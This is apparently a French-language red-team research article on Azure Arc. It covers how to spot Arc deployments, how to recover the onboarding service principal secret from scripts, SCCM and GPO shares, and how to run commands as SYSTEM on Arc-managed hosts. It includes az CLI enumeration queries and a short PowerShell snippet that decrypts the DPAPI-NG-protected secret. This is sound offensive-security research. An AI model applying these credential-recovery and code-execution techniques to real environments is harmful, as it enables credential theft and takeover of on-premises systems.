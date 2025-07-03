Balises
Sécurité

Identification et utilisation abusive d'Azure Arc pour l'escalade hybride et la persistance

Vue latérale en gros plan d'un homme penché sur un ordinateur dans un bureau sombre

Introduction

Mes recherches sur Microsoft Azure ont commencé lors d'une opération récente de l'équipe rouge où nous sommes tombés sur un script PowerShell contenant un secret de Service Principal codé en dur qui était responsable du déploiement d'Arc sur les systèmes sur site. Je ne savais pas grand-chose sur ce service et j'ai donc commencé à faire des recherches pour déterminer ce que nous pourrions faire avec les identifiants récupérés. Nous avons finalement pu utiliser des techniques documentées dans des recherches antérieures sur ce sujet pour obtenir l'exécution de code sur un contrôleur de domaine et revenir vers Microsoft Azure, mais cela m'a amené à réfléchir à des questions plus générales concernant Arc : comment l'identifier dans les environnements ? Quelles sont les (mauvaises) configurations qui pourraient permettre une escalade ? Quels autres vecteurs d’exécution de code existent à l’intérieur ? Pourrait-il être utilisé comme mécanisme de persistance hors bande ?

Alors, qu'est-ce qu'Azure Arc ? De manière générale, il étend les capacités de gestion natives d'Azure à diverses ressources non Azure telles que les systèmes sur site, les clusters Kubernetes et les déploiements VCenter, permettant ainsi de gérer ces systèmes via Azure Resource Manager de la même manière qu'un hôte natif Azure. Une fois que l'agent Arc est déployé sur un hôte, il enregistre la ressource dans Azure et expose une suite de fonctionnalités de gestion : surveillance, application de politiques, gestion des mises à jour, etc. Cependant, ce qui m'intéressait le plus était la possibilité de l'utiliser pour télécharger des fichiers à distance et exécuter des commandes à partir d'un processus fiable dans le contexte de NT_AUTHORITY\SYSTEM.Bien que certaines fonctionnalités d'Arc recoupent celles d'Intune, Arc est spécialement conçu pour gérer l'infrastructure et les serveurs, et non les points de terminaison ou les appareils mobiles.

Arc n'est pas tout à fait nouveau (il a été initialement lancé en 2019), et d'autres recherches antérieures ont montré comment il peut être utilisé pour exécuter du code et persister dans des environnements. De plus, les recherches existantes sur les attaques contre les machines virtuelles (VM) Azure présentent des similitudes importantes avec Arc, car les systèmes sur site configurés avec Arc peuvent être gérés dans Azure de la même manière qu'une VM native Azure. Avec cet article, j'espère apporter un peu plus de contexte en me concentrant sur des domaines qui n'ont pas été explorés de manière approfondie dans les recherches existantes, ainsi qu'en décrivant l'utilisation offensive de la plateforme dans un workflow typique de red teaming et en fournissant des conseils défensifs pour les déploiements Azure Arc.

Processus de déploiement Azure Arc

Avant d'entrer dans les détails de l'attaque d'Arc, je l'ai configuré dans un environnement de test afin de mieux comprendre le fonctionnement du service et le processus de déploiement. Arc étant un service Azure, il nécessite un abonnement et un groupe de ressources en aval auquel associer les ressources gérées. L'accès est également géré par la suite via des rôles de contrôle d'accès basé sur les rôles (RBAC) Azure attribués à ces périmètres. Si vous souhaitez configurer cela dans votre propre laboratoire, veuillez noter que vous devrez vous inscrire auprès des fournisseurs de ressources suivants dans votre abonnement sous Abonnements -> (votre abonnement) -> Paramètres -> Fournisseurs de ressources :

  • Microsoft.HybridCompute
  • Microsoft.GuestConfiguration
  • Microsoft.HybridConnectivity

Une fois ces conditions préalables remplies, un compte disposant des rôles appropriés attribués sur l’abonnement associé à Arc peut être utilisé pour accéder au service, où vous trouverez une fenêtre de gestion générale.

capture d'écran de la fenêtre d'aperçu de la gestion d'Arc
Figure 1 : fenêtre de présentation de la gestion d'arc

Comme nous n’avons pas encore déployé Arc nulle part, nous allons immédiatement passer à l’interface Ajouter des Ressources. Ce menu contient des options de déploiement et de découverte pour divers types d’appareils, mais la fonctionnalité de la machine qui nous permet de gérer les serveurs Windows et Linux hébergés en dehors du locataire Azure actuel est la plus intéressante. En cliquant ici, vous verrez s’afficher diverses options pour un déploiement sur un ou plusieurs hôtes.

capture d'écran des options de déploiement d'Arc
Figure 2 : options de déploiement d'Arc

Dans cette interface, les options Serveur unique et Windows Server avec installateur sont plus adaptées aux déploiements ponctuels, tandis que les options AWS / Gestion des mises à jour sont davantage axées sur les appareils cloud natifs déjà gérés via Azure ou AWS. Dans ce cas, c'est l'option de déploiement sur plusieurs serveurs qui nous intéresse le plus, car il s'agit probablement de la solution la plus couramment utilisée par un administrateur informatique dans le cadre d'un scénario de déploiement d'entreprise hybride.

En cliquant sur l'option de serveurs multiples, le workflow de déploiement pose ensuite diverses questions de base concernant l'abonnement, le groupe de ressources et la région auxquels les appareils gérés par Arc doivent être associés. Tout est assez simple jusqu'au bas de cette page, où il nous est demandé de saisir un principal de service à utiliser pour l'enregistrement des appareils lors de ce déploiement. Le bloc de texte ci-dessous indique essentiellement que vous avez besoin d'un principal de service configuré avec le rôle Azure Connected Machine Onboarding (Intégration des machines connectées à Azure) pour effectuer un déploiement, et vous offre également la possibilité de créer un nouveau principal de service avec le rôle approprié attribué.

capture d'écran de la configuration du principal de service dans le cadre d'un déploiement multiserveur
Figure 3 : configuration du principal de service dans une configuration de déploiement multi-serveurs

Dans ce cas, nous créerons un nouveau principal de service Test_Arc_SP pour notre déploiement.

capture d’écran illustrant la création d’un principal de service pour le déploiement d’Arc
Figure 4 : création d’un nouveau principal de service pour le déploiement d’Arc

Cette interface de création demande ensuite quels rôles nous accordons à notre nouveau principal de service. Nous pouvons sélectionner n'importe laquelle des options, y compris le rôle intéressant d'Azure Connected Machine Resource Administrator (administrateur des ressources de la machine connectée Azure), sans autre contexte ni avertissement sur les privilèges que ces rôles confèrent.

Attribution de rôles dans le cadre de la création de principaux de service
Figure 5 : attribution de rôles dans le cadre de la création d'un principal de service

Enfin, l'un des quatre mécanismes pris en charge pour déployer Arc sur des hôtes locaux nous est présenté, comme illustré dans l'image ci-dessous. Nous aborderons chacun de ces points de manière un peu plus approfondie dans la section Accéder à Arc ci-dessous.

capture d’écran des options prises en charge pour les déploiements Arc multi-hôtes
Figure 6 : options prises en charge pour les déploiements d'Arc sur plusieurs hôtes

Une fois qu’Arc est déployé avec le type d’installation choisi et qu’il est connecté à Azure, le nouveau système client apparaîtra sous Azure Arc -> ressources Azure Arc.

capture d'écran de la fenêtre de stock Arc indiquant l'intégration réussie de wks1-1
Figure 7 : fenêtre de stock d'Arc montrant l’intégration réussie de wks1-1

Identifier Azure Arc dans un environnement

Lorsque j'ai réfléchi à l'utilisation offensive d'Arc, la première question que je me suis posée était la suivante : « Lorsque je me trouve dans un environnement d'entreprise hybride, quelles mesures de détection puis-je mettre en œuvre pour déterminer si Arc est utilisé ? » Ces indicateurs peuvent être classés en deux catégories : Azure et sur site.

Homme regardant un ordinateur

Renforcez vos renseignements de sécurité  

Gardez une longueur d’avance sur les menaces grâce à l’actualité et aux réflexions sur la sécurité, l’IA et bien plus encore, dans la newsletter hebdomadaire Think.  

Azure

L'accès à Arc est contrôlé via Azure RBAC, ce qui signifie que l'accès au service et même la visibilité de base sur son utilisation ne sont pas du ressort des objets auxquels aucun rôle n'est attribué dans le cadre d'un abonnement associé à un déploiement Arc. Cela étant dit, il existe encore quelques méthodes indirectes qui peuvent nous permettre de déterminer si Arc est utilisé et même sur quels systèmes il est probablement installé, et qui peuvent être identifiées par un utilisateur Entra non privilégié. En parcourant les étapes du processus de déploiement ci-dessus, il y a plusieurs points où des objets sont ajoutés ou modifiés dans Microsoft Entra qui peuvent être observés pour déterminer si Arc est utilisé au sein d'un locataire.

Premièrement, lorsqu’un abonnement dans un environnement Azure est configuré avec les fournisseurs de ressources nécessaires à Arc (par exemple, Microsoft.HybridCompute), deux principaux de service intitulés Arc Token Service et Arc Public Cloud – Servers sont créés. Cela ne signifie pas nécessairement qu'Arc a effectivement été déployé au sein d'une entreprise, mais qu'au moins un abonnement par locataire a été configuré de manière à ce que le service soit pris en charge. Un exemple de cela est présenté ci-dessous dans un nouveau locataire Azure, avant et après la configuration des fournisseurs de ressources nécessaires pour Arc.

Recherche des entités de service associées à Arc avant de configurer un locataire pour Arc
Figure 8 : recherche des principaux de service associés à Arc avant de configurer un locataire pour Arc
Recherche des principaux services associés à Arc après la configuration d'un locataire pour Arc
Figure 9 : recherche des principaux de service associés à Arc après la configuration d’un locataire pour Arc

Dans le cadre du processus de déploiement, un principal de service est utilisé pour connecter les appareils à Arc, comme indiqué dans le processus de déploiement décrit dans la section précédente. Il peut s'agir soit d'un principal de service préexistant auquel les rôles RBAC nécessaires ont été attribués manuellement, soit d'un principal de service généré automatiquement via l'interface de déploiement Arc. Si un administrateur crée un principal de service directement via Arc, celui-ci est automatiquement configuré avec la balise AzureArcSPN par Azure, qui peut être recherchée par un utilisateur Entra non privilégié, soit directement à partir de la ligne de commande Azure, soit à partir des résultats de collecte de ROADrecon et AzureHound. Bien que cela ne fournisse pas non plus de preuve concrète que Arc a effectivement été déployé, un principal de service configuré de cette manière montrerait qu'un administrateur de ce locataire a au moins interagi avec les étapes du processus de déploiement d'Arc. Vous trouverez ci-dessous un exemple de création d'un principal de service via Arc, ainsi que les données de balise identifiables collectées par ROADrecon.

Balise AzureArcSPN indiquant un principal de service créé via le processus de déploiement dans Arc
Figure 10 : balise AzureArcSPN indiquant un principal de service créé lors du processus de déploiement dans Arc

Enfin, lorsqu’un système est intégré à Arc, une identité gérée est créée dans Entra pour la machine et des rôles peuvent être attribués dans Entra et Azure comme n’importe quel autre principal de service. Puisque cette identité gérée est présente dans Entra, par défaut, un principal non privilégié peut énumérer les systèmes embarqués dans Arc en filtrant les données Azure Recon collectées pour rechercher des appareils avec un ResourceID contenant Microsoft.HybridCompute (notez que cela diffère d’un appareil hybride joint dans Entra et ne devrait pas générer de faux positifs). Si vous avez accès à la ligne de commande Azure, ce processus est assez simple et utilise la commande suivante :

az ad sp list --filter "servicePrincipalType eq 'ManagedIdentity'" --query
"[?alternativeNames[?contains(@, 'Microsoft.HybridCompute')]].{Name: displayName,
ResourceID: alternativeNames[?contains(@, 'Microsoft.HybridCompute')]|[0]}" --output table
Identifier les clients Arc dans un locataire Azure sur la base de l'identifiant Microsoft.HybridCompute
Figure 11 : identification des clients Arc dans un locataire Azure sur la base de l'identifiant Microsoft.HybridCompute

Cette longue chaîne ResourceID présente également l'avantage supplémentaire de contenir l'ID d'abonnement et le groupe de ressources auquel le système est associé, ce qui permet d'identifier plusieurs déploiements Arc couvrant différents environnements.

Par ailleurs, si vous avez collecté des données Azure via ROADrecon ou AzureHound, vous pouvez analyser ces résultats afin d'identifier les objets gérés par Arc. Dans ROADrecon, les informations pertinentes sont stockées dans le ResourceID, et dans les fichiers de collecte JSON d’AzureHound, les mêmes informations sont stockées dans l’attribut AlternativeNames. Bien qu’il ne semble pas que cet attribut soit copié dans BloodHound ou qu’il ne soit pas directement accessible, une recherche directe dans le fichier JSON peut permettre de récupérer une liste complète des objets gérés.

Analyse de la sortie ROADrecon pour identifier un client Arc
Figure 12 : analyse de la sortie ROADrecon pour identifier un client Arc
Analyse de la sortie brute d'AzureHound pour identifier les clients Arc
Figure 13 : analyse de la sortie brute d'AzureHound pour identifier les clients Arc

Sur site

Les indicateurs sur site du déploiement Arc se répartissent en deux catégories : localhost et réseau. Lorsque le client Arc est installé sur un système, il crée le dossier C:\Program Files\AzureConnectedMachineAgent, qui contient tous les fichiers pertinents liés au client Arc. La présence de ce dossier, ainsi que des processus et services liés à Arc (par exemple, gc_arc_service.exe ou arcproxy.exe), peut fournir des éléments simples à vérifier. De plus, en fonction du mécanisme de déploiement utilisé pour transférer le client Arc vers les systèmes du réseau, d'autres éléments peuvent être recherchés. Par exemple, si Arc est déployé via GPO, le processus d'installation crée un GPO généré automatiquement nommé [MSFT] Azure Arc Servers Onboarding(DateTimeOfGPOCreation).

Déploiement automatique du GPO Arc
Figure 14 : GPO de déploiement d'Arc généré automatiquement

Accès à Azure Arc

Par conséquent, si nous avons identifié qu'Arc est utilisé dans un environnement, comment pouvons-nous y accéder ? Pour répondre à cette question, il est important de comprendre d'abord ce qui constitue spécifiquement l'accès qui nous intéresse. Étant donné que l'objectif principal de l'accès est généralement d'exécuter du code sur un point de terminaison géré, il peut être utile de partir des autorisations qui permettent l'exécution de code pour remonter jusqu'aux rôles Azure qui accordent ces autorisations. Cela peut constituer un bon point de départ pour identifier les comptes et les rôles qui pourraient nous intéresser. En nous référant aux recherches antérieures de Benedikt Strobl chez NSIDE Attack Logic, nous constatons que nous pouvons exécuter une requête PowerShell qui permettra d'obtenir tous les rôles accordant des autorisations qui activent au moins un mécanisme d'exécution de code via Arc (nous reviendrons plus en détail sur ces mécanismes dans la section suivante). La requête et le résultat obtenu sont visibles ci-dessous :

az role definition list --query "[?(!isCustom && (contains(permissions[0].actions,
'Microsoft.HybridCompute/machines/extensions/write') || contains(permissions[0].actions,
'Microsoft.HybridCompute/machines/extensions/*') || contains(permissions[0].actions,
'Microsoft.GuestConfiguration/guestConfigurationAssignments/write') || contains(permissions[0].actions,
'Microsoft.GuestConfiguration/*/write') || contains(permissions[0].actions,
'Microsoft.GuestConfiguration/guestConfigurationAssignments/*') || contains(permissions[0].actions
'Microsoft.HybridCompute/machines/*/write') || contains(permissions[0].actions,
'Microsoft.HybridCompute/machines/*') || contains(permissions[0].actions,
'Microsoft.HybridCompute/*/write') || contains(permissions[0].actions, '*/write') || contains(permissions[0].actions, '*')))].{DisplayName:roleName, Actions:permissions[0].actions}" --output table

 

Rôles accordant la possibilité d'exécuter du code sur des clients gérés par Arc via au moins un canal
Figure 15 : rôles accordant la possibilité d'exécuter du code sur des clients gérés par Arc via au moins un canal

Outre quelques rôles étranges qui sortent du lot, comme celui de Log Analytics Contributor, l'un des plus intéressants est celui d'Azure Connected Machine Resource Administrator (administrateur des ressources des machines connectées Azure). Si vous vous souvenez de la section précédente consacrée au processus de déploiement d'Azure Arc, il s'agissait de l'un des rôles pouvant être attribués au principal de service créé lors du processus de déploiement d'Arc.

Attribution des rôles à un nouveau principal de service pour le déploiement d'Arc. Ne cliquez pas sur le bouton administrateur, même si vous en avez envie
Figure 16 : attribution de rôles à un nouveau principal de service pour le déploiement d'Arc. Ne cliquez pas sur le bouton administrateur, même si vous en avez envie

Cela signifie essentiellement que le principal de service de déploiement, dont le secret sera nécessairement accessible sur le réseau local, n'est plus qu'à une case à cocher (une case sans avertissement ni contexte supplémentaire sur les risques) de devenir administrateur dans Arc. Un principal de service auquel ce rôle administratif a été attribué par inadvertance lors de sa création pourrait non seulement être utilisé pour enregistrer de nouveaux clients Arc dans Azure, mais aussi pour exécuter des commandes sur n'importe quel client Arc installé. C'est cette omission compréhensible que nous avons identifiée et exploitée lors de notre récente évaluation, ce qui nous a permis d'élever nos privilèges via Arc et de prendre le contrôle de l'environnement sur site du client.

Ce principal de service de déploiement semble constituer une cible initiale appropriée, en particulier si vous ne disposez pas des privilèges nécessaires pour obtenir la liste des autres comptes auxquels sont attribués les autres rôles mentionnés permettant l'exécution de code. Mais comment pourriez-vous essayer d’y accéder ? Premièrement, et probablement de la manière la plus directe, si vous disposez d'un accès dans Entra pour accéder à un principal de service associé à Arc en y ajoutant un secret (par exemple, propriétaire du principal de service, administrateur d'application, etc.), vous pouvez modifier directement l'objet et l'utiliser ensuite pour vous authentifier, ce qui vous permet potentiellement d'obtenir un accès privilégié à Arc. Par ailleurs, les mécanismes de déploiement utilisés par Arc peuvent également être mal configurés ou permettre une escalade via la récupération du secret du principal de service de déploiement. Nous examinerons ensuite chacun des quatre principaux mécanismes de déploiement d'entreprise pris en charge par Arc afin d'identifier les voies d'escalade potentielles à surveiller.

Script de base

La méthode de déploiement par défaut et la plus basique pour Arc est de télécharger un script PowerShell auto-généré qu'un administrateur informatique peut exécuter sur plusieurs systèmes. Ce script extrait l’installateur MSI pertinent depuis le site web de Microsoft et effectue ensuite la configuration suivante pour connecter le client installé au bon locataire Azure. Il est intéressant de noter que le mécanisme d'authentification par défaut pris en charge dans ce script généré automatiquement consiste à coder en dur le secret du principal de service utilisé pour le déploiement dans le script.

Script par défaut généré par Arc pour les déploiements multi-hôtes
Figure 17 : script par défaut généré par Arc pour les déploiements multi-hôtes

Étant donné que ce mécanisme de déploiement est très simple, il n'y a pas grand-chose à ajouter concernant l'obtention d'un accès, si ce n'est de rester vigilant lors de la surveillance normale du partage de fichiers pour les scripts PowerShell dont le nom par défaut est OnboardingScript.ps1, ainsi que pour les scripts dont le nom ou le contenu est lié à Arc.

Gestionnaire de configuration

La sélection de Configuration Manager (Gestionnaire de configuration) pour le déploiement génère un script PowerShell identique à celui ci-dessus, la principale différence étant qu'Arc fournit des instructions supplémentaires sur la manière de déployer le script directement via System Center Configuration Manager (SCCM) de Microsoft, soit par une exécution directe du script, soit sous forme de séquence de tâches.

Étapes de déploiement spécifiques au SCCM, recommandant le déploiement via un script SCCM ou une séquence de tâches
Figure 18 : étapes de déploiement spécifiques au SCCM, recommandant le déploiement via un script du SCCM ou une séquence de tâches

Bien qu'il s'agisse des deux mécanismes recommandés pour le déploiement, un administrateur informatique peut également utiliser un autre mécanisme de déploiement via SCCM, tel que l'installation d'un package ou d'une application. Quelle que soit l'option de déploiement utilisée, il est important de garder à l'esprit le concept de collectes dans SCCM, qui servent de champ d'application cible pour le déploiement de séquences de tâches et (éventuellement) de scripts. Tenter de récupérer des données SCCM à partir d'un hôte aléatoire dans l'environnement ne donnera probablement pas de bons résultats, car si l'hôte ne fait pas partie de la collection appropriée, il ne sera généralement pas en mesure de récupérer les informations pertinentes. Au lieu de cela, se déplacer latéralement vers un hôte identifié comme client Arc (ou mieux encore, un point de gestion SCCM ou un serveur de base de données) puis effectuer une détection SCCM donnera probablement de meilleurs résultats.

Gestionnaire de configuration—script

Le gestionnaire de configuration SCCM contient une fonctionnalité qui permet aux administrateurs d'exécuter des scripts PowerShell sur les systèmes gérés. Les scripts ne sont pas récupérés par le client SCCM de la même manière que les séquences de tâches ou les packages ; ils sont plutôt envoyés du serveur à la demande aux systèmes clients. Pour tester cela, nous pouvons créer un script simple dans le Gestionnaire de configuration SCCM en utilisant le script de déploiement Arc généré automatiquement. Nous laisserons le secret intact pour le moment, car le système sur lequel nous déployons Arc est déjà installé.

Création d’un script SCCM pour déployer Arc
Figure 19 : création d’un script du SCCM pour déployer Arc

Lorsque le script est déployé via SCCM, il est copié dans le répertoire C :\Windows\CCM\ScriptStore du système client et configuré avec une liste de contrôle d'accès discrétionnaire (DACL) qui restreint l'accès uniquement à NT_AUTHORITY\SYSTEM, avant d'être exécuté par le client SCCM. Les fichiers de ce dossier sont périodiquement nettoyés en fonction de configurations spécifiques à l’instance, mais il est judicieux de vérifier s’il s’agit de ce script ou d’autres scripts susceptibles de contenir des données sensibles.

Exécution du script de déploiement sur les clients SCCM. Repérez le GUID commençant par 4909*
Figure 20 : exécution du script de déploiement sur les clients du SCCM. Prenez note du GUID commençant par 4909*
Script PowerShell créé sur le système client SCCM avec le GUID correspondant 4909*
Figure 21 : Script PowerShell créé sur le système client du SCCM avec le GUID correspondant 4909*
DACL sur ce script limitant l'accès à NT_AUTHORITY\SYSTEM
Figure 22 : DACL sur ce script limitant l'accès à NT_AUTHORITY\SYSTEM
Le contenu de ce script PowerShell sur le client du SCCM comprend l'intégralité du script initialement déployé via le SCCM
Figure 23 : le contenu de ce script PowerShell sur le client du SCCM comprend l'intégralité du script initialement déployé via le SCCM

Par ailleurs, si vous avez accès à la base de données SCCM, vous pouvez récupérer directement tous les scripts créés dans SCCM à l'aide du module ScriptData de SQLRecon. Vous trouverez ci-dessous un exemple du résultat obtenu après avoir exécuté ce module sur la base de données du site pour une instance SCCM configurée avec un script permettant de déployer Arc.

Récupération du script du SCCM utilisé pour déployer Arc à partir de la base de données du site du SCCM avec SQLRecon
Figure 24 : récupération du script du SCCM utilisé pour déployer Arc à partir de la base de données du site du SCCM avec SQLRecon

En réalité, le déploiement via un script SCCM n'est probablement pas très probable dans la pratique, car l'exécution d'un script SCCM est un processus manuel et ponctuel. Si de nouveaux serveurs sont mis en ligne et doivent être ajoutés à Arc à l'avenir, un administrateur devra se rappeler d'exécuter à nouveau le script pour l'appliquer à d'autres systèmes.

Gestionnaire de configuration—séquence de tâches

Un processus de déploiement plus automatisé et évolutif consisterait à utiliser une séquence de tâches appliquée à une collection SCCM. Pour tester ce mécanisme, nous pouvons créer une séquence de tâches simple qui exécute le script de déploiement Arc et la déployer dans une collection SCCM contenant un système à partir duquel nous exécutons.

Déploiement d'Arc via une séquence de tâches du SCCM
Figure 25 : déploiement d'Arc via une séquence de tâches du SCCM

Après avoir déployé ce script, nous pouvons exécuter la commande get secrets (obtenir les secrets) dans SharpSCCM pour récupérer les séquences de tâches accessibles contenant des scripts, car les stratégies contenant des scripts sont accompagnées du drapeau secret.

Récupération d'une séquence de tâches contenant un script de déploiement Arc à l'aide de SharpSCCM
Fig 26 : Récupération d'une séquence de tâches contenant un script de déploiement d'Arc à l'aide de SharpSCCM

La propriété SourceScript dans la stratégie pertinente contient une représentation b64 du script original transmis. La conversion en texte clair nous permet de récupérer le script d’origine.

Décodage du script récupéré en texte clair
Figure 27 : décodage du script récupéré en texte clair

De manière similaire aux options disponibles lors de la récupération d'un script, si nous avons accès à la base de données du site SCCM, nous pouvons également récupérer directement les données de séquence de tâches à l'aide de SQLRecon.

Récupération de la séquence de tâches utilisée pour déployer Arc à partir de la base de données du site du SCCM avec SQLRecon
Figure 28 : récupération de la séquence de tâches utilisée pour déployer Arc à partir de la base de données du site du SCCM avec SQLRecon

Politique de groupe

Le déploiement d'Arc via la stratégie de groupe est légèrement plus complexe que les deux mécanismes précédents et comprend plusieurs étapes, à commencer par la configuration d'un partage réseau vers lequel le script, exécuté via un objet de stratégie de groupe (GPO), peut pointer. Les directives officielles indiquent utilement que tous les ordinateurs du domaine doivent disposer d'un accès en lecture et en écriture à ce partage, ce qui signifie que si ce mécanisme de déploiement est utilisé, le secret du principal de service doit pouvoir être récupéré à partir de n'importe quel contexte NT_AUTHORITY\SYSTEM dans le domaine.

Étapes de déploiement spécifiques aux GPO, invitant à la création d'un partage de réseau et au téléchargement d'un paquet d'installation
Figure 29 : étapes de déploiement spécifiques à GPO, invitant à créer un partage réseau et à télécharger un package d'installation

Après avoir configuré le partage et téléchargé et copié le fichier MSI du client Arc, l'étape suivante consiste à télécharger un dépôt GitHub contenant les scripts PowerShell et les DLL associées qui sont utilisés pour créer automatiquement le GPO.

Étapes de déploiement spécifiques au GPO, demandant le téléchargement des fichiers à utiliser lors de la création du GPO
Figure 30 : étapes de déploiement spécifiques au GPO, invitant à télécharger les fichiers à utiliser lors de la création du GPO

Enfin, un script PowerShell qui appelle les fichiers téléchargés depuis GitHub est généré, avec des arguments basés sur l’emplacement du partage de déploiement Arc précédemment configuré.

Commande à exécuter par un administrateur une fois toutes les configurations précédentes terminées pour créer le GPO de déploiement d'Arc
Figure 31 : commande à exécuter par un administrateur une fois toutes les configurations préalables terminées pour créer le GPO du déploiement d'Arc

L’exécution de ce script PowerShell résultant provoquera la création d’une GPO, qui crée une tâche planifiée installant le client Arc en utilisant les fichiers hébergés sur le partage de déploiement réseau et le connectant à Azure. Cette GPO peut ensuite être liée à une unité organisationnelle (UO) contenant des systèmes sur lesquels déployer Arc.

Contenu du GPO de déploiement d'Arc résultant qui crée une tâche planifiée chargée de déployer Arc sur les systèmes.
Figure 32 : contenu du GPO du déploiement d'Arc qui crée une tâche planifiée chargée de déployer Arc sur les systèmes

Si un objet de stratégie de groupe (GPO) correspondant à cette convention de nommage est identifié lors d'une détection Active Directory standard, les fichiers GPO peuvent être examinés afin de déterminer l'emplacement du partage réseau contenant les fichiers de déploiement.

GPO de déploiement d'Arc avec un GUID commençant par 5C25
Figure 33 : GPO de déploiement Arc avec un GUID commençant par 5C25
Fichier de configuration des tâches planifiées distribué par le GPO de déploiement d'Arc, qui contient le chemin d'accès au script de déploiement d'Arc
Figure 34 : fichier de configuration des tâches planifiées transmis par le GPO de déploiement d'Arc, qui contient le chemin d'accès au script de déploiement d'Arc

Avec un certain type d'accès dans le contexte de NT_AUTHORITY\SYSTEM, ce partage peut être consulté à distance (s'il a été créé avec l'accès par défaut / recommandé par Microsoft), ce qui donnera le résultat suivant :

Fichiers contenus dans le partage de fichiers de déploiement d'Arc
Figure 35 : fichiers contenus contenus dans le partage de fichiers de déploiement d'Arc

Le fichier le plus intéressant est le fichier encryptedServicePrincipalSecret, dont le nom est extrêmement explicite. Un coup d’œil au script EnableAzureArc.ps1 montre que ce secret est un blob chiffré avec DPAPI-NG.

Code PowerShell chargé de récupérer le secret du principal de service via le déchiffrement du blob DPAPI-NG
Figure 36 : code PowerShell permettant de récupérer le secret du principal de service via le déchiffrement du blob DPAPI-NG

DPAPI-NG (ou Cryptographic Next Generation [CNG] DPAPI) permet non seulement d'utiliser les fonctionnalités de chiffrement et de déchiffrement DPAPI spécifiques à un utilisateur ou à une machine, mais également d'effectuer des opérations basées sur l'appartenance d'un objet. Par exemple, dans ce cas, le blob DPAPI-NG dans encryptedServicePrincipalSecret est configuré pour permettre à tout membre du groupe d'ordinateurs du domaine de le déchiffrer. J'ai créé un script PowerShell très simple à titre de preuve de concept, mais il devrait être assez simple de traduire le code de AzureArcDeployment.psm1 (qui n'est lui-même qu'un wrapper autour du code .NET) en un assemblage pouvant être exécuté en mémoire sur une balise dans le contexte de NT_AUTHORITY\SYSTEM afin de récupérer et de déchiffrer le secret.

Déchiffrer le blob DPAPI-NG pour récupérer le secret du principal de service en texte brut
Figure 37 : déchiffrement du blob DPAPI-NG pour récupérer le secret du principal de service en clair
        $SourceFilesFullPath = "\\Path\to\Arc\Deploy\Folder"
        $workfolder = "C:\Windows\temp"
        Copy-Item (Join-Path $SourceFilesFullPath "AzureArcDeployment.psm1") $workfolder -
Force
        Import-Module (Join-Path $workfolder "AzureArcDeployment.psm1")
        $encryptedSecret = Get-Content (Join-Path $SourceFilesFullPath
encryptedServicePrincipalSecret)
        $sps = [DpapiNgUtil]::UnprotectBase64($encryptedSecret)

Enfin, toutes les autres informations de connexion pertinentes, telles que l'ID du principal de service, l'ID d'abonnement, etc., se trouvent dans le fichier ArcInfo.json, également situé dans le même partage de déploiement.

Contenu du fichier ArcInfo.json
Figure 38 : contenu du fichier ArcInfo.json

Ansible

La dernière option de déploiement officielle génère un playbook Ansible très similaire aux scripts PowerShell présentés ci-dessus. Les spécificités de l'attaque Ansible varient beaucoup en fonction de la configuration et de l'environnement, c'est pourquoi nous ne nous étendrons pas davantage sur ce mécanisme de déploiement.

capture d’écran du déploiement d’Arc via Ansible
Figure 39 : déploiement d’Arc via Ansible

Une note sur les déploiements Linux

Bien qu’Arc prenne en charge la gestion des hôtes Linux, les méthodes de déploiement disponibles directement dans la lame Arc dans Azure sont fortement orientées vers les appareils Windows. Les déploiements Linux sont pris en charge par l’utilisation d’un script bash, mais de la même manière que les déploiements Ansible, ils auront probablement un degré de variation beaucoup plus élevé lorsqu’ils seront appliqués dans un environnement d’entreprise.

Exécution du code via Azure Arc

Pour la suite, supposons que nous ayons réussi à récupérer le secret d'un principal de service et que ce principal de service (ou un autre compte récupéré) dispose de privilèges d'exécution dans Arc. Comme l'objectif principal d'Arc est d'exposer les appareils sur site au plan de contrôle Azure, une variété de primitives d'exécution de code typiquement associées aux machines virtuelles Azure entrent en jeu pour accéder aux hôtes sur site sur lesquels le client Arc est installé. Toutefois, si l'on se concentre sur les possibilités d'exécution qui ne requièrent que les autorisations spécifiques à l'Arc mentionnées ci-dessus, on obtient deux grandes catégories d'actions d'exécution : les commandes d'exécution et les ajouts/modifications d'extensions. Les deux vecteurs d'exécution fonctionnent de manière pratiquement identique à une exécution équivalente sur une machine virtuelle Azure et ont été largement documentés par d'autres dans des blogs/outils précédents. Nous n'entrerons donc pas dans les détails au-delà de leur utilisation opérationnelle et de quelques particularités intéressantes qui ne sont pas aussi largement documentées.

Exécuter la commande

La commande d'exécution est une sorte de pseudo-extension qui partage de nombreuses caractéristiques sur disque et spécificités de l'arborescence d'exécution avec d'autres extensions, mais qui est automatiquement installée avec Arc et n'apparaît pas dans la liste des extensions installées d'un système géré. Cette fonctionnalité permet d'exécuter facilement des commandes sur un client géré via Arc, la principale condition préalable étant que la version du client soit >= 1.33. Vous pouvez vérifier cela à l'aide de la commande az connectedmachine show, comme indiqué ci-dessous.

Résultat de la commande az connectedmachine show, indiquant une version supérieure à 1.33
Figure 40 : sortie de la commande az connectedmachine show, indiquant une version > 1.33

Notez que tenter d’exécuter une commande via la ligne de commande az (CLI) nécessite non seulement les autorisations d’écriture mentionnées précédemment mais aussi des privilèges de lecture sur le groupe de ressources, ce que par défaut un principal de service généré automatiquement n’aura pas. Par conséquent, toute tentative d'exécution d'une commande directement à partir de la CLI d'az entraîne une erreur.

Toute tentative d'utilisation de la CLI d'az pour exécuter une commande sur un client géré entraîne une erreur
Figure 41 : la tentative d'utilisation de la CLI az pour exécuter une commande sur un client géré entraîne une erreur

Vous pouvez contourner ce problème en interagissant directement avec l'API REST d'Azure, mais il ne sera pas possible de récupérer les résultats des commandes exécutées. Dans cet exemple, nous allons créer une tâche d’exécution nommée « run-notePad », qui se lance simplement dans « notePad.exe » sur le système client.

Exécuter la même commande depuis l'API REST d'az
Figure 42 : exécution de la même commande à partir de l'API REST az

La commande transmise est écrite dans un script PowerShell dans le dossier C:\Packages\Plugins\Microsoft.CPlat.Core.RunCommandWindows\[version]\Downloads , avec un nom correspondant au nom de la tâche d'exécution créée dans Arc et finalement exécutée dans le contexte de NT_AUTHORITY\SYSTEM.

Script écrit sur le système client Arc à la suite de l'exécution de la commande d'exécution
Figure 43 : script écrit dans le système client Arc à la suite de l'exécution de la commande d'exécution
Arborescence des processus de la commande Arc d'exécution. Le processus exécuté (6848) est un processus enfant de powershell.exe (9048), qui se termine après avoir créé le processus enfant.
Figure 44 : arborescence des processus de la commande Arc d'exécution. Le processus exécuté (6848) est un processus enfant de powershell.exe (9048), qui se termine après avoir créé le processus enfant.

